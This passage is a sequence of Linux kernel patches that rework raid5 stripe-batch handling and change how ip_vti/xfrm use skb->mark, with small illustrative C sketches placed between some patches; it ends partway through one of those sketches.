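/* A stripe must be skipped by handle_stripe() when it is a batch member
 * that is not the head, even if its BATCH_READY bit was already cleared. */
static int must_skip(const struct stripe *sh)
{
    return sh->batch_head && sh->batch_head != sh;
}

int main(void)
{
    struct stripe head, member, lone = { NULL };

    head.batch_head = &head;
    member.batch_head = &head;
    printf("%d %d %d\n", must_skip(&head), must_skip(&member), must_skip(&lone));
    /* prints: 0 1 0 */
    return 0;
}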
Signed-off-by: NeilBrown --- drivers/md/raid5.c | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 42d0ea6c8597..e58736740bac 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -4200,9 +4200,13 @@ static void analyse_stripe(struct stripe_head *sh, struct stripe_head_state *s) static int clear_batch_ready(struct stripe_head *sh) { + /* Return '1' if this is a member of batch, or + * '0' if it is a lone stripe or a head which can now be + * handled. + */ struct stripe_head *tmp; if (!test_and_clear_bit(STRIPE_BATCH_READY, &sh->state)) - return 0; + return (sh->batch_head && sh->batch_head != sh); spin_lock(&sh->stripe_lock); if (!sh->batch_head) { spin_unlock(&sh->stripe_lock); From 4e3d62ff4976f26d22b8b91572a49136bb3a23f1 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 11:50:16 +1000 Subject: [PATCH 337/872] md/raid5: remove condition test from check_break_stripe_batch_list. handle_stripe_clean_event() contains a chunk of code very similar to check_break_stripe_batch_list(). If we make the latter more like the former, we can end up with just one copy of this code. This first step removed the condition (and the 'check_') part of the name. This has the added advantage of making it clear what check is being performed at the point where the function is called. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index e58736740bac..fc5c4039c394 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -4234,16 +4234,11 @@ static int clear_batch_ready(struct stripe_head *sh) return 0; } -static void check_break_stripe_batch_list(struct stripe_head *sh) +static void break_stripe_batch_list(struct stripe_head *head_sh) { - struct stripe_head *head_sh, *next; + struct stripe_head *sh, *next; int i; - if (!test_and_clear_bit(STRIPE_BATCH_ERR, &sh->state)) - return; - - head_sh = sh; - list_for_each_entry_safe(sh, next, &head_sh->batch_list, batch_list) { list_del_init(&sh->batch_list); @@ -4290,7 +4285,8 @@ static void handle_stripe(struct stripe_head *sh) return; } - check_break_stripe_batch_list(sh); + if (test_and_clear_bit(STRIPE_BATCH_ERR, &sh->state)) + break_stripe_batch_list(sh); if (test_bit(STRIPE_SYNC_REQUESTED, &sh->state) && !sh->batch_head) { spin_lock(&sh->stripe_lock); From fb642b92c267beeefd352af9bc461eac93a7552c Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 12:00:47 +1000 Subject: [PATCH 338/872] md/raid5: duplicate some more handle_stripe_clean_event code in break_stripe_batch_list break_stripe_batch list didn't clear head_sh->batch_head. This was probably a bug. Also clear all R5_Overlap flags and if any were cleared, wake up 'wait_for_overlap'. This isn't always necessary but the worst effect is a little extra checking for code that is waiting on wait_for_overlap. Also, don't use wake_up_nr() because that does the wrong thing if 'nr' is zero, and it number of flags cleared doesn't strongly correlate with the number of threads to wake. 
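A compact model of the resulting wake-up logic, clear every R5_Overlap bit, remember whether anything was cleared, then issue one plain wake_up() at the end, is sketched below. The flag value and the printf standing in for the wake-up call are illustrative only:

#include <stdio.h>
#include <stdbool.h>

#define R5_OVERLAP (1u << 3)   /* stand-in value, not the kernel's bit number */
#define NDISKS 4

struct dev { unsigned int flags; };

static void break_batch(struct dev devs[NDISKS])
{
    bool do_wakeup = false;

    for (int i = 0; i < NDISKS; i++) {
        if (devs[i].flags & R5_OVERLAP) {
            devs[i].flags &= ~R5_OVERLAP;
            do_wakeup = true;
        }
    }
    if (do_wakeup)                           /* one wake_up(), regardless of count */
        printf("wake_up(&conf->wait_for_overlap)\n");
}

int main(void)
{
    struct dev devs[NDISKS] = { { R5_OVERLAP }, { 0 }, { R5_OVERLAP }, { 0 } };

    break_batch(devs);
    return 0;
}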
Signed-off-by: NeilBrown --- drivers/md/raid5.c | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index fc5c4039c394..6de2e1edd492 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -3557,7 +3557,8 @@ static void handle_stripe_clean_event(struct r5conf *conf, spin_lock_irq(&head_sh->stripe_lock); head_sh->batch_head = NULL; spin_unlock_irq(&head_sh->stripe_lock); - wake_up_nr(&conf->wait_for_overlap, wakeup_nr); + if (wakeup_nr) + wake_up(&conf->wait_for_overlap); if (head_sh->state & STRIPE_EXPAND_SYNC_FLAG) set_bit(STRIPE_HANDLE, &head_sh->state); } @@ -4238,6 +4239,7 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) { struct stripe_head *sh, *next; int i; + int do_wakeup = 0; list_for_each_entry_safe(sh, next, &head_sh->batch_list, batch_list) { @@ -4250,10 +4252,12 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) STRIPE_EXPAND_SYNC_FLAG)); sh->check_state = head_sh->check_state; sh->reconstruct_state = head_sh->reconstruct_state; - for (i = 0; i < sh->disks; i++) + for (i = 0; i < sh->disks; i++) { + if (test_and_clear_bit(R5_Overlap, &sh->dev[i].flags)) + do_wakeup = 1; sh->dev[i].flags = head_sh->dev[i].flags & (~((1 << R5_WriteError) | (1 << R5_Overlap))); - + } spin_lock_irq(&sh->stripe_lock); sh->batch_head = NULL; spin_unlock_irq(&sh->stripe_lock); @@ -4261,6 +4265,15 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) set_bit(STRIPE_HANDLE, &sh->state); release_stripe(sh); } + spin_lock_irq(&head_sh->stripe_lock); + head_sh->batch_head = NULL; + spin_unlock_irq(&head_sh->stripe_lock); + for (i = 0; i < head_sh->disks; i++) + if (test_and_clear_bit(R5_Overlap, &head_sh->dev[i].flags)) + do_wakeup = 1; + + if (do_wakeup) + wake_up(&head_sh->raid_conf->wait_for_overlap); } static void handle_stripe(struct stripe_head *sh) From 3960ce796198254b7a1b420dc9a26d80928523bd Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 12:20:36 +1000 Subject: [PATCH 339/872] md/raid5: add handle_flags arg to break_stripe_batch_list. When we break a stripe_batch_list we sometimes want to set STRIPE_HANDLE on the individual stripes, and sometimes not. So pass a 'handle_flags' arg. If it is zero, always set STRIPE_HANDLE (on non-head stripes). If not zero, only set it if any of the given flags are present. 
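The meaning of the new argument reduces to a small predicate, modelled below with arbitrary example bits (a restatement of the rule above, not the kernel code):

#include <stdio.h>

/* handle_flags == 0: always mark the stripe for handling.
 * handle_flags != 0: mark it only if one of those state bits is set. */
static int should_set_handle(unsigned long state, unsigned long handle_flags)
{
    return handle_flags == 0 || (state & handle_flags) != 0;
}

int main(void)
{
    printf("%d\n", should_set_handle(0x10, 0x00));  /* 1: zero mask, always handle */
    printf("%d\n", should_set_handle(0x10, 0x01));  /* 0: requested bits not set */
    printf("%d\n", should_set_handle(0x11, 0x01));  /* 1: a requested bit is set */
    return 0;
}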
Signed-off-by: NeilBrown --- drivers/md/raid5.c | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 6de2e1edd492..0b65eb51e562 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -4235,7 +4235,8 @@ static int clear_batch_ready(struct stripe_head *sh) return 0; } -static void break_stripe_batch_list(struct stripe_head *head_sh) +static void break_stripe_batch_list(struct stripe_head *head_sh, + unsigned long handle_flags) { struct stripe_head *sh, *next; int i; @@ -4261,8 +4262,9 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) spin_lock_irq(&sh->stripe_lock); sh->batch_head = NULL; spin_unlock_irq(&sh->stripe_lock); - - set_bit(STRIPE_HANDLE, &sh->state); + if (handle_flags == 0 || + sh->state & handle_flags) + set_bit(STRIPE_HANDLE, &sh->state); release_stripe(sh); } spin_lock_irq(&head_sh->stripe_lock); @@ -4271,6 +4273,8 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) for (i = 0; i < head_sh->disks; i++) if (test_and_clear_bit(R5_Overlap, &head_sh->dev[i].flags)) do_wakeup = 1; + if (head_sh->state & handle_flags) + set_bit(STRIPE_HANDLE, &head_sh->state); if (do_wakeup) wake_up(&head_sh->raid_conf->wait_for_overlap); @@ -4299,7 +4303,7 @@ static void handle_stripe(struct stripe_head *sh) } if (test_and_clear_bit(STRIPE_BATCH_ERR, &sh->state)) - break_stripe_batch_list(sh); + break_stripe_batch_list(sh, 0); if (test_bit(STRIPE_SYNC_REQUESTED, &sh->state) && !sh->batch_head) { spin_lock(&sh->stripe_lock); From 1b956f7a8f9aa63ea9644ab8c3374cf381993363 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 12:40:26 +1000 Subject: [PATCH 340/872] md/raid5: be more selective about distributing flags across batch. When a batch of stripes is broken up, we keep some of the flags that were per-stripe, and copy other flags from the head to all others. This only happens while a stripe is being handled, so many of the flags are irrelevant. The "SYNC_FLAGS" (which I've renamed to make it clear there are several) and STRIPE_DEGRADED are set per-stripe and so need to be preserved. STRIPE_INSYNC is the only flag that is set on the head that needs to be propagated to all others. For safety, add a WARN_ON if others are set, except: STRIPE_HANDLE - this is safe and per-stripe and we are going to set in several cases anyway STRIPE_INSYNC STRIPE_IO_STARTED - this is just a hint and doesn't hurt. STRIPE_ON_PLUG_LIST STRIPE_ON_RELEASE_LIST - It is a point pointless for a batched stripe to be on one of these lists, but it can happen as can be safely ignored. 
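The flag handout described above boils down to a mask-and-copy step. The kernel's set_mask_bits(ptr, mask, bits) helper behaves essentially like *ptr = (*ptr & ~mask) | bits, done atomically, so the per-stripe result can be modelled as below; the bit values are arbitrary stand-ins:

#include <stdio.h>

/* Keep only the member's own preserved bits, then copy the allowed bits
 * (just INSYNC in the patch) from the batch head. */
static unsigned long redistribute(unsigned long member_state, unsigned long head_state,
                                  unsigned long preserved, unsigned long copy_from_head)
{
    return (member_state & preserved) | (head_state & copy_from_head);
}

int main(void)
{
    unsigned long preserved = 0x0f;  /* stand-in for EXPAND_SYNC flags + DEGRADED */
    unsigned long insync    = 0x10;  /* stand-in for STRIPE_INSYNC */

    /* member had 0x83 set, head is INSYNC: member ends up with 0x13 */
    printf("%#lx\n", redistribute(0x83, 0x10, preserved, insync));
    return 0;
}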
Signed-off-by: NeilBrown --- drivers/md/raid5.c | 55 ++++++++++++++++++++++++++++++++++++---------- drivers/md/raid5.h | 2 +- 2 files changed, 45 insertions(+), 12 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 0b65eb51e562..1141b7f62e6e 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -3534,10 +3534,27 @@ static void handle_stripe_clean_event(struct r5conf *conf, struct stripe_head, batch_list); list_del_init(&sh->batch_list); - set_mask_bits(&sh->state, ~STRIPE_EXPAND_SYNC_FLAG, - head_sh->state & ~((1 << STRIPE_ACTIVE) | - (1 << STRIPE_PREREAD_ACTIVE) | - STRIPE_EXPAND_SYNC_FLAG)); + WARN_ON_ONCE(sh->state & ((1 << STRIPE_ACTIVE) | + (1 << STRIPE_SYNCING) | + (1 << STRIPE_REPLACED) | + (1 << STRIPE_PREREAD_ACTIVE) | + (1 << STRIPE_DELAYED) | + (1 << STRIPE_BIT_DELAY) | + (1 << STRIPE_FULL_WRITE) | + (1 << STRIPE_BIOFILL_RUN) | + (1 << STRIPE_COMPUTE_RUN) | + (1 << STRIPE_OPS_REQ_PENDING) | + (1 << STRIPE_DISCARD) | + (1 << STRIPE_BATCH_READY) | + (1 << STRIPE_BATCH_ERR) | + (1 << STRIPE_BITMAP_PENDING))); + WARN_ON_ONCE(head_sh->state & ((1 << STRIPE_DISCARD) | + (1 << STRIPE_REPLACED))); + + set_mask_bits(&sh->state, ~(STRIPE_EXPAND_SYNC_FLAGS | + (1 << STRIPE_DEGRADED)), + head_sh->state & (1 << STRIPE_INSYNC)); + sh->check_state = head_sh->check_state; sh->reconstruct_state = head_sh->reconstruct_state; for (i = 0; i < sh->disks; i++) { @@ -3549,7 +3566,7 @@ static void handle_stripe_clean_event(struct r5conf *conf, spin_lock_irq(&sh->stripe_lock); sh->batch_head = NULL; spin_unlock_irq(&sh->stripe_lock); - if (sh->state & STRIPE_EXPAND_SYNC_FLAG) + if (sh->state & STRIPE_EXPAND_SYNC_FLAGS) set_bit(STRIPE_HANDLE, &sh->state); release_stripe(sh); } @@ -3559,7 +3576,7 @@ static void handle_stripe_clean_event(struct r5conf *conf, spin_unlock_irq(&head_sh->stripe_lock); if (wakeup_nr) wake_up(&conf->wait_for_overlap); - if (head_sh->state & STRIPE_EXPAND_SYNC_FLAG) + if (head_sh->state & STRIPE_EXPAND_SYNC_FLAGS) set_bit(STRIPE_HANDLE, &head_sh->state); } @@ -4246,11 +4263,27 @@ static void break_stripe_batch_list(struct stripe_head *head_sh, list_del_init(&sh->batch_list); - set_mask_bits(&sh->state, ~STRIPE_EXPAND_SYNC_FLAG, - head_sh->state & ~((1 << STRIPE_ACTIVE) | - (1 << STRIPE_PREREAD_ACTIVE) | - (1 << STRIPE_DEGRADED) | - STRIPE_EXPAND_SYNC_FLAG)); + WARN_ON_ONCE(sh->state & ((1 << STRIPE_ACTIVE) | + (1 << STRIPE_SYNCING) | + (1 << STRIPE_REPLACED) | + (1 << STRIPE_PREREAD_ACTIVE) | + (1 << STRIPE_DELAYED) | + (1 << STRIPE_BIT_DELAY) | + (1 << STRIPE_FULL_WRITE) | + (1 << STRIPE_BIOFILL_RUN) | + (1 << STRIPE_COMPUTE_RUN) | + (1 << STRIPE_OPS_REQ_PENDING) | + (1 << STRIPE_DISCARD) | + (1 << STRIPE_BATCH_READY) | + (1 << STRIPE_BATCH_ERR) | + (1 << STRIPE_BITMAP_PENDING))); + WARN_ON_ONCE(head_sh->state & ((1 << STRIPE_DISCARD) | + (1 << STRIPE_REPLACED))); + + set_mask_bits(&sh->state, ~(STRIPE_EXPAND_SYNC_FLAGS | + (1 << STRIPE_DEGRADED)), + head_sh->state & (1 << STRIPE_INSYNC)); + sh->check_state = head_sh->check_state; sh->reconstruct_state = head_sh->reconstruct_state; for (i = 0; i < sh->disks; i++) { diff --git a/drivers/md/raid5.h b/drivers/md/raid5.h index 01cdb9f3a0c4..896d603ad0da 100644 --- a/drivers/md/raid5.h +++ b/drivers/md/raid5.h @@ -342,7 +342,7 @@ enum { */ }; -#define STRIPE_EXPAND_SYNC_FLAG \ +#define STRIPE_EXPAND_SYNC_FLAGS \ ((1 << STRIPE_EXPAND_SOURCE) |\ (1 << STRIPE_EXPAND_READY) |\ (1 << STRIPE_EXPANDING) |\ From 787b76fa37159050f6d26aebfa6210009baed93b Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 
12:56:41 +1000 Subject: [PATCH 341/872] md/raid5: call break_stripe_batch_list from handle_stripe_clean_event Now that the code in break_stripe_batch_list() is nearly identical to the end of handle_stripe_clean_event, replace the later with a function call. The only remaining difference of any interest is the masking that is applieds to dev[i].flags copied from head_sh. R5_WriteError certainly isn't wanted as it is set per-stripe, not per-patch. R5_Overlap isn't wanted as it is explicitly handled. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 61 +++------------------------------------------- 1 file changed, 4 insertions(+), 57 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 1141b7f62e6e..3254504b1080 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -3420,6 +3420,8 @@ static void handle_stripe_fill(struct stripe_head *sh, set_bit(STRIPE_HANDLE, &sh->state); } +static void break_stripe_batch_list(struct stripe_head *head_sh, + unsigned long handle_flags); /* handle_stripe_clean_event * any written block on an uptodate or failed drive can be returned. * Note that if we 'wrote' to a failed drive, it will be UPTODATE, but @@ -3433,7 +3435,6 @@ static void handle_stripe_clean_event(struct r5conf *conf, int discard_pending = 0; struct stripe_head *head_sh = sh; bool do_endio = false; - int wakeup_nr = 0; for (i = disks; i--; ) if (sh->dev[i].written) { @@ -3522,62 +3523,8 @@ static void handle_stripe_clean_event(struct r5conf *conf, if (atomic_dec_and_test(&conf->pending_full_writes)) md_wakeup_thread(conf->mddev->thread); - if (!head_sh->batch_head || !do_endio) - return; - for (i = 0; i < head_sh->disks; i++) { - if (test_and_clear_bit(R5_Overlap, &head_sh->dev[i].flags)) - wakeup_nr++; - } - while (!list_empty(&head_sh->batch_list)) { - int i; - sh = list_first_entry(&head_sh->batch_list, - struct stripe_head, batch_list); - list_del_init(&sh->batch_list); - - WARN_ON_ONCE(sh->state & ((1 << STRIPE_ACTIVE) | - (1 << STRIPE_SYNCING) | - (1 << STRIPE_REPLACED) | - (1 << STRIPE_PREREAD_ACTIVE) | - (1 << STRIPE_DELAYED) | - (1 << STRIPE_BIT_DELAY) | - (1 << STRIPE_FULL_WRITE) | - (1 << STRIPE_BIOFILL_RUN) | - (1 << STRIPE_COMPUTE_RUN) | - (1 << STRIPE_OPS_REQ_PENDING) | - (1 << STRIPE_DISCARD) | - (1 << STRIPE_BATCH_READY) | - (1 << STRIPE_BATCH_ERR) | - (1 << STRIPE_BITMAP_PENDING))); - WARN_ON_ONCE(head_sh->state & ((1 << STRIPE_DISCARD) | - (1 << STRIPE_REPLACED))); - - set_mask_bits(&sh->state, ~(STRIPE_EXPAND_SYNC_FLAGS | - (1 << STRIPE_DEGRADED)), - head_sh->state & (1 << STRIPE_INSYNC)); - - sh->check_state = head_sh->check_state; - sh->reconstruct_state = head_sh->reconstruct_state; - for (i = 0; i < sh->disks; i++) { - if (test_and_clear_bit(R5_Overlap, &sh->dev[i].flags)) - wakeup_nr++; - sh->dev[i].flags = head_sh->dev[i].flags; - } - - spin_lock_irq(&sh->stripe_lock); - sh->batch_head = NULL; - spin_unlock_irq(&sh->stripe_lock); - if (sh->state & STRIPE_EXPAND_SYNC_FLAGS) - set_bit(STRIPE_HANDLE, &sh->state); - release_stripe(sh); - } - - spin_lock_irq(&head_sh->stripe_lock); - head_sh->batch_head = NULL; - spin_unlock_irq(&head_sh->stripe_lock); - if (wakeup_nr) - wake_up(&conf->wait_for_overlap); - if (head_sh->state & STRIPE_EXPAND_SYNC_FLAGS) - set_bit(STRIPE_HANDLE, &head_sh->state); + if (head_sh->batch_head && do_endio) + break_stripe_batch_list(head_sh, STRIPE_EXPAND_SYNC_FLAGS); } static void handle_stripe_dirtying(struct r5conf *conf, From 626f2092c85ac847bb80b3257eb6a565dec32278 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 22 May 
2015 14:03:10 +1000 Subject: [PATCH 342/872] md/raid5: break stripe-batches when the array has failed. Once the array has too much failure, we need to break stripe-batches up so they can all be dealt with. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 3254504b1080..553d54b87052 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -4337,6 +4337,7 @@ static void handle_stripe(struct stripe_head *sh) if (s.failed > conf->max_degraded) { sh->check_state = 0; sh->reconstruct_state = 0; + break_stripe_batch_list(sh, 0); if (s.to_read+s.to_write+s.written) handle_failed_stripe(conf, sh, &s, disks, &s.return_bi); if (s.syncing + s.replacing) From cd5279c194f89c9b97c294af4aaf4ea8c5e3c704 Mon Sep 17 00:00:00 2001 From: Alexander Duyck Date: Wed, 27 May 2015 07:16:43 -0700 Subject: [PATCH 343/872] ip_vti/ip6_vti: Do not touch skb->mark on xmit Instead of modifying skb->mark we can simply modify the flowi_mark that is generated as a result of the xfrm_decode_session. By doing this we don't need to actually touch the skb->mark and it can be preserved as it passes out through the tunnel. Signed-off-by: Alexander Duyck Signed-off-by: Steffen Klassert --- net/ipv4/ip_vti.c | 5 +++-- net/ipv6/ip6_vti.c | 4 +++- 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/net/ipv4/ip_vti.c b/net/ipv4/ip_vti.c index 9f7269f3c54a..4c318e1c13c8 100644 --- a/net/ipv4/ip_vti.c +++ b/net/ipv4/ip_vti.c @@ -216,8 +216,6 @@ static netdev_tx_t vti_tunnel_xmit(struct sk_buff *skb, struct net_device *dev) memset(&fl, 0, sizeof(fl)); - skb->mark = be32_to_cpu(tunnel->parms.o_key); - switch (skb->protocol) { case htons(ETH_P_IP): xfrm_decode_session(skb, &fl, AF_INET); @@ -233,6 +231,9 @@ static netdev_tx_t vti_tunnel_xmit(struct sk_buff *skb, struct net_device *dev) return NETDEV_TX_OK; } + /* override mark with tunnel output key */ + fl.flowi_mark = be32_to_cpu(tunnel->parms.o_key); + return vti_xmit(skb, dev, &fl); } diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c index ed9d681207fa..104de4da3ff3 100644 --- a/net/ipv6/ip6_vti.c +++ b/net/ipv6/ip6_vti.c @@ -495,7 +495,6 @@ vti6_tnl_xmit(struct sk_buff *skb, struct net_device *dev) int ret; memset(&fl, 0, sizeof(fl)); - skb->mark = be32_to_cpu(t->parms.o_key); switch (skb->protocol) { case htons(ETH_P_IPV6): @@ -516,6 +515,9 @@ vti6_tnl_xmit(struct sk_buff *skb, struct net_device *dev) goto tx_err; } + /* override mark with tunnel output key */ + fl.flowi_mark = be32_to_cpu(t->parms.o_key); + ret = vti6_xmit(skb, dev, &fl); if (ret < 0) goto tx_err; From 049f8e2e28d9c3dac0744cc2f19d3157c7fb5646 Mon Sep 17 00:00:00 2001 From: Alexander Duyck Date: Wed, 27 May 2015 07:16:49 -0700 Subject: [PATCH 344/872] xfrm: Override skb->mark with tunnel->parm.i_key in xfrm_input This change makes it so that if a tunnel is defined we just use the mark from the tunnel instead of the mark from the skb header. By doing this we can avoid the need to set skb->mark inside of the tunnel receive functions. 
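The key-selection rule described here can be shown in isolation: default to the skb mark, but when the packet came in through a vti/vti6 tunnel use that tunnel's i_key, converted from its on-the-wire byte order, as the state lookup key. The types below are stand-ins for the kernel's, with ntohl() standing in for be32_to_cpu():

#include <stdio.h>
#include <stdint.h>
#include <arpa/inet.h>

struct tunnel { uint32_t i_key_be; };   /* key kept in big-endian form */

static uint32_t lookup_mark(uint32_t skb_mark, const struct tunnel *tn)
{
    return tn ? ntohl(tn->i_key_be) : skb_mark;   /* tunnel key wins when present */
}

int main(void)
{
    struct tunnel tn = { htonl(42) };

    printf("%u %u\n", lookup_mark(7, NULL), lookup_mark(7, &tn));  /* 7 42 */
    return 0;
}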
Signed-off-by: Alexander Duyck Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_input.c | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c index 526c4feb3b50..b58286ecd156 100644 --- a/net/xfrm/xfrm_input.c +++ b/net/xfrm/xfrm_input.c @@ -13,6 +13,8 @@ #include #include #include +#include +#include static struct kmem_cache *secpath_cachep __read_mostly; @@ -186,6 +188,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type) struct xfrm_state *x = NULL; xfrm_address_t *daddr; struct xfrm_mode *inner_mode; + u32 mark = skb->mark; unsigned int family; int decaps = 0; int async = 0; @@ -203,6 +206,18 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type) XFRM_SPI_SKB_CB(skb)->daddroff); family = XFRM_SPI_SKB_CB(skb)->family; + /* if tunnel is present override skb->mark value with tunnel i_key */ + if (XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4) { + switch (family) { + case AF_INET: + mark = be32_to_cpu(XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4->parms.i_key); + break; + case AF_INET6: + mark = be32_to_cpu(XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6->parms.i_key); + break; + } + } + /* Allocate new secpath or COW existing one. */ if (!skb->sp || atomic_read(&skb->sp->refcnt) != 1) { struct sec_path *sp; @@ -229,7 +244,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type) goto drop; } - x = xfrm_state_lookup(net, skb->mark, daddr, spi, nexthdr, family); + x = xfrm_state_lookup(net, mark, daddr, spi, nexthdr, family); if (x == NULL) { XFRM_INC_STATS(net, LINUX_MIB_XFRMINNOSTATES); xfrm_audit_state_notfound(skb, family, spi, seq); From d55c670cbc54b2270a465cdc382ce71adae45785 Mon Sep 17 00:00:00 2001 From: Alexander Duyck Date: Wed, 27 May 2015 07:16:54 -0700 Subject: [PATCH 345/872] ip_vti/ip6_vti: Preserve skb->mark after rcv_cb call The vti6_rcv_cb and vti_rcv_cb calls were leaving the skb->mark modified after completing the function. This resulted in the original skb->mark value being lost. Since we only need skb->mark to be set for xfrm_policy_check we can pull the assignment into the rcv_cb calls and then just restore the original mark after xfrm_policy_check has been completed. 
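The save/override/restore pattern is worth seeing on its own: the tunnel key is placed in skb->mark only for the duration of the policy check, and the caller's original mark survives. The sketch below uses a trivial stand-in for xfrm_policy_check() and simplified types:

#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>

struct skb { uint32_t mark; };

static bool policy_check(const struct skb *skb)
{
    return skb->mark == 42;           /* stand-in for xfrm_policy_check() */
}

static bool rcv_cb(struct skb *skb, uint32_t tunnel_i_key)
{
    uint32_t orig_mark = skb->mark;
    bool ret;

    skb->mark = tunnel_i_key;         /* only for the policy check */
    ret = policy_check(skb);
    skb->mark = orig_mark;            /* original mark is preserved */
    return ret;
}

int main(void)
{
    struct skb skb = { .mark = 7 };

    printf("%d mark=%u\n", rcv_cb(&skb, 42), skb.mark);   /* 1 mark=7 */
    return 0;
}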
Signed-off-by: Alexander Duyck Signed-off-by: Steffen Klassert --- net/ipv4/ip_vti.c | 9 +++++++-- net/ipv6/ip6_vti.c | 9 +++++++-- 2 files changed, 14 insertions(+), 4 deletions(-) diff --git a/net/ipv4/ip_vti.c b/net/ipv4/ip_vti.c index 4c318e1c13c8..0c152087ca15 100644 --- a/net/ipv4/ip_vti.c +++ b/net/ipv4/ip_vti.c @@ -65,7 +65,6 @@ static int vti_input(struct sk_buff *skb, int nexthdr, __be32 spi, goto drop; XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4 = tunnel; - skb->mark = be32_to_cpu(tunnel->parms.i_key); return xfrm_input(skb, nexthdr, spi, encap_type); } @@ -91,6 +90,8 @@ static int vti_rcv_cb(struct sk_buff *skb, int err) struct pcpu_sw_netstats *tstats; struct xfrm_state *x; struct ip_tunnel *tunnel = XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4; + u32 orig_mark = skb->mark; + int ret; if (!tunnel) return 1; @@ -107,7 +108,11 @@ static int vti_rcv_cb(struct sk_buff *skb, int err) x = xfrm_input_state(skb); family = x->inner_mode->afinfo->family; - if (!xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family)) + skb->mark = be32_to_cpu(tunnel->parms.i_key); + ret = xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family); + skb->mark = orig_mark; + + if (!ret) return -EPERM; skb_scrub_packet(skb, !net_eq(tunnel->net, dev_net(skb->dev))); diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c index 104de4da3ff3..ff3bd863fa03 100644 --- a/net/ipv6/ip6_vti.c +++ b/net/ipv6/ip6_vti.c @@ -322,7 +322,6 @@ static int vti6_rcv(struct sk_buff *skb) } XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6 = t; - skb->mark = be32_to_cpu(t->parms.i_key); rcu_read_unlock(); @@ -342,6 +341,8 @@ static int vti6_rcv_cb(struct sk_buff *skb, int err) struct pcpu_sw_netstats *tstats; struct xfrm_state *x; struct ip6_tnl *t = XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6; + u32 orig_mark = skb->mark; + int ret; if (!t) return 1; @@ -358,7 +359,11 @@ static int vti6_rcv_cb(struct sk_buff *skb, int err) x = xfrm_input_state(skb); family = x->inner_mode->afinfo->family; - if (!xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family)) + skb->mark = be32_to_cpu(t->parms.i_key); + ret = xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family); + skb->mark = orig_mark; + + if (!ret) return -EPERM; skb_scrub_packet(skb, !net_eq(t->net, dev_net(skb->dev))); From 56ccc1125bc141cf63927eda7febff4216dea2d3 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 28 May 2015 17:53:29 +1000 Subject: [PATCH 346/872] md: fix race when unfreezing sync_action A recent change removed the need for locking around writing to "sync_action" (and various other places), but introduced a subtle race. When e.g. setting 'reshape' on a 'frozen' array, the 'frozen' flag is cleared before 'reshape' is set, so the md thread can get in and start trying recovery - which isn't wanted. So instead of clearing MD_RECOVERY_FROZEN for any command except 'frozen', only clear it when each specific command is parsed. This allows the handling of 'reshape' to clear the bit while a lock is held. Also remove some places where we set MD_RECOVERY_NEEDED, as it is always set on non-error exit of the function. 
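The ordering change can be seen in a few lines: the FROZEN bit is cleared only once the written command has been recognised, and for "reshape" only with the device lock held, so nothing clears it ahead of time for an unrelated or invalid command. The userspace model below is only an illustration of that ordering, not the md code:

#include <stdio.h>
#include <string.h>
#include <pthread.h>

#define FROZEN 1UL

static unsigned long recovery = FROZEN;
static pthread_mutex_t mddev_lock = PTHREAD_MUTEX_INITIALIZER;

static void action_store(const char *cmd)
{
    if (strcmp(cmd, "frozen") == 0) {
        recovery |= FROZEN;
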